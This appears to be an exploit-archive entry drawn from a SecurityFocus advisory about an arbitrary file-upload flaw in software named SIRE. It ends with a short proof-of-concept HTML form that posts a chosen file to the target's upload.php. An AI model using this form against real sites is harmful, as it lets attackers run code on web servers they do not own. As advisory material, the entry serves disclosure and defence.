10 lines
No EOL
547 B
Text
10 lines
No EOL
547 B
Text
source: https://www.securityfocus.com/bid/17431/info
|
|
|
|
SIRE is prone to an arbitrary file-upload vulnerability.
|
|
|
|
An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
|
|
|
|
<form enctype="multipart/form-data" method="post" action="http://Trajet/upload.php?"> Download File<br>
|
|
|
|
<input name="fichier" type="file" size="48"><br>
|
|
<input type="submit" name="upload" value="uploader"><form> |